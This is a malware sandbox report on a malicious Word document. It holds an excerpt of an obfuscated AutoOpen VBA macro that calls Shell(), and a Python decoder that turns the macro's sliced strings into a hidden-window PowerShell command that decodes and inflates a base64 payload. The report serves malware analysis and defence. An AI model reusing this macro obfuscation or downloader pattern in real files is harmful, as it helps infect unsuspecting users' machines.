Verdict: MALICIOUS (risk score 142)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function, so it is designed to run automatically when the document is opened. The macro uses a Shell() call and builds its command line from obfuscated string literals: each literal is sliced with nested Left(Right(...)) calls and the pieces are concatenated. The fragments visible in the preview (for example 'i3rshell zOAoW4rYcfwezHJXCKDZ-jCFZva' and '6c25x-oBjECT io.CoHmpReSZTjCFZvaven2Ph.DlcrKGWfoCzujmP') carry the letters of a PowerShell invocation and are consistent with downloader functionality that retrieves and executes a second-stage payload.
Heuristics (5)

- VBA macros detected (medium; OLE_VBA_MACROS; 2 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical; OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high; OLE_VBA_AUTOOPEN): AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. This description conflicts with the rest of the report, which did recover a VBA project (macros.bas, listed under extracted artifacts); treat the marker as corroborating the AutoOpen finding rather than as standalone evidence.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace that Office writes into drawing markup, not a download location.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 129529 bytes | 8802270af3e0422a8f28673597da8b0de3003ad1894b75407e4c27ea0320e655 |
Preview script (first 1,000 lines of the extracted script; the preview is cut off after the last statement shown)

```vb
Attribute VB_Name = "IsOMqNqqiQsr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function OOuXFkPDirT()
On Error Resume Next
thUrTfb = OJDBDRch + CSng(687366) + 796075 / Sin(122938 - CByte(981610) / 997252 - Round(687366)) + zJJYEU * JLDZvtw - (796075 + 122938 + 981610 - 6873660)
Set QCQvAA = KiYlSvE
ORscZKZElz = "i3rshell zOAoW4rYcfwezHJXCKDZ-jCFZva"
YUccGtGJ = CStr(Left(Right(ORscZKZElz, 24), 1)) + Left(Right(ORscZKZElz, 17), 2) + CStr(Left(Right(ORscZKZElz, 34), 5)) + CStr(Left(Right(ORscZKZElz, 29), 2)) + CStr(Left(Right(ORscZKZElz, 7), 1)) + Left(Right(ORscZKZElz, 23), 1)
XRzlPRwQzF = "i3wsTyleA hAdj4iYdfaUzHJnDoDZTjCFZvaidJ2PhsWl"
ZGmFM = CStr(Left(Right(XRzlPRwQzF, 30), 1)) + Left(Right(XRzlPRwQzF, 21), 3) + CStr(Left(Right(XRzlPRwQzF, 43), 6)) + Left(Right(XRzlPRwQzF, 36), 2) + CStr(Left(Right(XRzlPRwQzF, 9), 2)) + CStr(Left(Right(XRzlPRwQzF, 28), 1))
YRiGiSl = "6c25x-oBjECT io.CoHmpReSZTjCFZvaven2Ph.DlcrKGWfoCzujmP ( nEWFBv4oTvfIdBmEkYuKzw2oSIoNCoWKsJWJBGZhmWmb"
aanVFbhm = CStr(Left(Right(YRiGiSl, 68), 2)) + CStr(Left(Right(YRiGiSl, 47), 6)) + CStr(Left(Right(YRiGiSl, 97), 14)) + CStr(Left(Right(YRiGiSl, 82), 5)) + Left(Right(YRiGiSl, 20), 4) + CStr(Left(Right(YRiGiSl, 63), 2)) + CStr(Left(Right(YRiGiSl, 29), 1))
kmSEElidsi = "i3esTREAM([Adj4rFc.aUzHJXCLATTjCFZvavtJiohsWlcrK"
kzEiK = CStr(Left(Right(kmSEElidsi, 32), 1)) + CStr(Left(Right(kmSEElidsi, 22), 3)) + CStr(Left(Right(kmSEElidsi, 46), 7)) + CStr(Left(Right(kmSEElidsi, 39), 2)) + Left(Right(kmSEElidsi, 9), 2) + Left(Right(kmSEElidsi, 30), 1)
GzYtSIDqouJ = "3i6rySTReAMdj4rYcfMUz][SCKDZTeMoZvavysTPhsWlcrKGWfoCzu"
hnqEPHvL = CStr(Left(Right(GzYtSIDqouJ, 36), 1)) + CStr(Left(Right(GzYtSIDqouJ, 25), 3)) + CStr(Left(Right(GzYtSIDqouJ, 51), 8)) + Left(Right(GzYtSIDqouJ, 33), 3) + Left(Right(GzYtSIDqouJ, 18), 3)
EIjTZTMw = "6c25VeRT]::FroMfbASEJXCKDZTeMFZTrvtJ2PhsWlcr.conoCzujmPYQisOgFBv464sfIdBm7kYuKzw2"
EmZisKmlPDJ = CStr(Left(Right(EIjTZTMw, 54), 2)) + Left(Right(EIjTZTMw, 37), 4) + Left(Right(EIjTZTMw, 77), 11) + CStr(Left(Right(EIjTZTMw, 65), 4)) + CStr(Left(Right(EIjTZTMw, 16), 3)) + CStr(Left(Right(EIjTZTMw, 50), 2)) + Left(Right(EIjTZTMw, 24), 1)
ihhKfRmEbb = "Z 'bR6Zr5xNzOAdjG(YcfaUzHTXCKD"
Jidzr = Left(Right(ihhKfRmEbb, 20), 1) + Left(Right(ihhKfRmEbb, 14), 2) + CStr(Left(Right(ihhKfRmEbb, 29), 4)) + CStr(Left(Right(ihhKfRmEbb, 24), 2)) + CStr(Left(Right(ihhKfRmEbb, 5), 1))
wuuzM = fAcYJNEXZZ + CSng(158302) + 786837 / Sin(452645 - CByte(985248) / 497487 - Round(158302)) + mPOaIAs * kTnflQOJzs - (786837 + 452645 + 985248 - 1583020)
Set buvArwzUJj = ZqEvGAEbqtC
TFNLJhT = "Z8PtJ9c259AzOAdtIrYcfaxzHJX"
zITLaHqM = Left(Right(TFNLJhT, 18), 1) + CStr(Left(Right(TFNLJhT, 12), 2)) + CStr(Left(Right(TFNLJhT, 26), 4)) + Left(Right(TFNLJhT, 22), 1) + CStr(Left(Right(TFNLJhT, 5), 1))
PpwTo = Chr(43)
dpbAdwJTKB = "ZTsJvEra5xAsOAdj4r6kfaUzHJX3KDZTj"
XoHizvZoE = Left(Right(dpbAdwJTKB, 22), 1) + CStr(Left(Right(dpbAdwJTKB, 15), 2)) + CStr(Left(Right(dpbAdwJTKB, 32), 5)) + Left(Right(dpbAdwJTKB, 27), 2) + Left(Right(dpbAdwJTKB, 6), 1)
KtLlw = "ZKk0l6Dt5xszOAdjXVYcfaUzHOXCKD"
iNrIY = Left(Right(KtLlw, 20), 1) + Left(Right(KtLlw, 14), 2) + CStr(Left(Right(KtLlw, 29), 4)) + CStr(Left(Right(KtLlw, 24), 2)) + CStr(Left(Right(KtLlw, 5), 1))
BpiBMnoa = "i3i6VEUoZNjHBJIbCsfaUzHJJCKLlTjCFZvavtJdw17WlcrKGWfoCzujmPxlGsOgFBv4oTvf"
lGGXHi = CStr(Left(Right(BpiBMnoa, 48), 1)) + CStr(Left(Right(BpiBMnoa, 33), 4)) + CStr(Left(Right(BpiBMnoa, 68), 10)) + CStr(Left(Right(BpiBMnoa, 58), 4)) + CStr(Left(Right(BpiBMnoa, 14), 3)) + Left(Right(BpiBMnoa, 45), 2)
JiizwB = "3iM7oxD6zOAdjvrCEfaUz9/XCKWzTjCFZvavtJ2"
PlCTdXqDIZl = CStr(Left(Right(JiizwB, 26), 1)) + CStr(Left(Right(JiizwB, 18), 2)) + CStr(Left(Right(JiizwB, 37), 6)) + Left(Right(JiizwB, 24), 2) + CStr(Left(Right(JiizwB, 13), 2))
JCTcl = "i6c257Lb1W178czi8WI2rPJuIXZTjCFZvavt87Phs ... (truncated)
```
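As an added worked example (not part of the report and not the analyzer's own tooling), the following Python script reproduces the macro's string slicing so the obfuscated literals can be read without executing the macro. It embeds the six literal assignments and the six Left(Right(...)) statements copied verbatim from the preview above, evaluates each statement with VBA's Right/Left semantics (Right keeps the last n characters, Left the first m of those) and concatenates the windows in source order. The regex-driven parser and the vba_left/vba_right helpers are this example's own construction; run over the full macros.bas they would resolve every statement of the same shape, with a marker for operands that are not string literals. On these six statements the output is "owershell -W", "inDowsTyle hidd", "en ( nEWx-oBjECT io.CompReSSIoN.DE", "FLATesTREAM([io.", "MeMorySTReAM][SysT" and "eM.conVeRT]::FroMbASE64sTri", which read together as a PowerShell invocation with -WindowStyle hidden that wraps a base64-decoded buffer in IO.Compression.DeflateStream over an IO.MemoryStream. The missing leading "p" of "powershell" and the "x" in "nEWx-oBjECT" are exactly what these lines yield; how the rest of the 129 KB script normalises them is not visible in the truncated preview.

```python
import re

# Statements copied verbatim from the report's extracted-script preview
# (macros.bas): each string literal together with the Left(Right(...))
# statement that slices it. The arithmetic noise and the unused Set
# statements between them are left out.
MACRO_LINES = r'''
ORscZKZElz = "i3rshell zOAoW4rYcfwezHJXCKDZ-jCFZva"
YUccGtGJ = CStr(Left(Right(ORscZKZElz, 24), 1)) + Left(Right(ORscZKZElz, 17), 2) + CStr(Left(Right(ORscZKZElz, 34), 5)) + CStr(Left(Right(ORscZKZElz, 29), 2)) + CStr(Left(Right(ORscZKZElz, 7), 1)) + Left(Right(ORscZKZElz, 23), 1)
XRzlPRwQzF = "i3wsTyleA hAdj4iYdfaUzHJnDoDZTjCFZvaidJ2PhsWl"
ZGmFM = CStr(Left(Right(XRzlPRwQzF, 30), 1)) + Left(Right(XRzlPRwQzF, 21), 3) + CStr(Left(Right(XRzlPRwQzF, 43), 6)) + Left(Right(XRzlPRwQzF, 36), 2) + CStr(Left(Right(XRzlPRwQzF, 9), 2)) + CStr(Left(Right(XRzlPRwQzF, 28), 1))
YRiGiSl = "6c25x-oBjECT io.CoHmpReSZTjCFZvaven2Ph.DlcrKGWfoCzujmP ( nEWFBv4oTvfIdBmEkYuKzw2oSIoNCoWKsJWJBGZhmWmb"
aanVFbhm = CStr(Left(Right(YRiGiSl, 68), 2)) + CStr(Left(Right(YRiGiSl, 47), 6)) + CStr(Left(Right(YRiGiSl, 97), 14)) + CStr(Left(Right(YRiGiSl, 82), 5)) + Left(Right(YRiGiSl, 20), 4) + CStr(Left(Right(YRiGiSl, 63), 2)) + CStr(Left(Right(YRiGiSl, 29), 1))
kmSEElidsi = "i3esTREAM([Adj4rFc.aUzHJXCLATTjCFZvavtJiohsWlcrK"
kzEiK = CStr(Left(Right(kmSEElidsi, 32), 1)) + CStr(Left(Right(kmSEElidsi, 22), 3)) + CStr(Left(Right(kmSEElidsi, 46), 7)) + CStr(Left(Right(kmSEElidsi, 39), 2)) + Left(Right(kmSEElidsi, 9), 2) + Left(Right(kmSEElidsi, 30), 1)
GzYtSIDqouJ = "3i6rySTReAMdj4rYcfMUz][SCKDZTeMoZvavysTPhsWlcrKGWfoCzu"
hnqEPHvL = CStr(Left(Right(GzYtSIDqouJ, 36), 1)) + CStr(Left(Right(GzYtSIDqouJ, 25), 3)) + CStr(Left(Right(GzYtSIDqouJ, 51), 8)) + Left(Right(GzYtSIDqouJ, 33), 3) + Left(Right(GzYtSIDqouJ, 18), 3)
EIjTZTMw = "6c25VeRT]::FroMfbASEJXCKDZTeMFZTrvtJ2PhsWlcr.conoCzujmPYQisOgFBv464sfIdBm7kYuKzw2"
EmZisKmlPDJ = CStr(Left(Right(EIjTZTMw, 54), 2)) + Left(Right(EIjTZTMw, 37), 4) + Left(Right(EIjTZTMw, 77), 11) + CStr(Left(Right(EIjTZTMw, 65), 4)) + CStr(Left(Right(EIjTZTMw, 16), 3)) + CStr(Left(Right(EIjTZTMw, 50), 2)) + Left(Right(EIjTZTMw, 24), 1)
'''

# VBA Left(Right(VAR, n), m): Right() keeps the last n characters of VAR and
# Left() then keeps the first m of those, so each call is an m-character
# window that starts n characters from the end of the literal.
SLICE_RE = re.compile(r'Left\(Right\((\w+),\s*(\d+)\),\s*(\d+)\)')
# VAR = "literal" (the literals on the page contain no embedded quotes)
LITERAL_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')


def vba_right(s: str, n: int) -> str:
    """VBA Right(): last n characters; n <= 0 gives "", n >= Len(s) gives s."""
    return "" if n <= 0 else s[-n:]


def vba_left(s: str, n: int) -> str:
    """VBA Left(): first n characters; n <= 0 gives ""."""
    return "" if n <= 0 else s[:n]


def decode_slices(vba_text: str) -> list[str]:
    """Plaintext produced by each slicing statement, in source order.

    Literal assignments populate a symbol table; every later statement that
    contains Left(Right(...)) calls is evaluated by resolving each call
    against that table and concatenating the windows left to right, which
    is what the macro's '+' operator does. CStr() wrappers are no-ops on
    strings, and the regex simply ignores them.
    """
    literals: dict[str, str] = {}
    decoded: list[str] = []
    for line in vba_text.splitlines():
        lit = LITERAL_RE.match(line)
        if lit:
            literals[lit.group(1)] = lit.group(2)
            continue
        calls = SLICE_RE.findall(line)
        if not calls:
            continue
        windows = []
        for var, n, m in calls:
            if var not in literals:
                # Operand is not a string literal seen so far (the preview is
                # truncated); keep a marker rather than guessing its value.
                windows.append(f"<{var}>")
            else:
                windows.append(vba_left(vba_right(literals[var], int(n)), int(m)))
        decoded.append("".join(windows))
    return decoded


def decode_command(vba_text: str) -> str:
    """Join the per-statement fragments in the order the macro emits them."""
    return "".join(decode_slices(vba_text))


if __name__ == "__main__":
    for piece in decode_slices(MACRO_LINES):
        print(repr(piece))
    print(decode_command(MACRO_LINES))
```

Because the decoder never evaluates anything but Left/Right/concatenation, it is safe to run on the raw macros.bas from the artifacts table; the parts it cannot resolve (base64 chunks assembled from the later "Z..." literals, the Chr(43) join character) show up as markers or as gaps, which is the point at which to switch to a sandboxed run or a full VBA emulator.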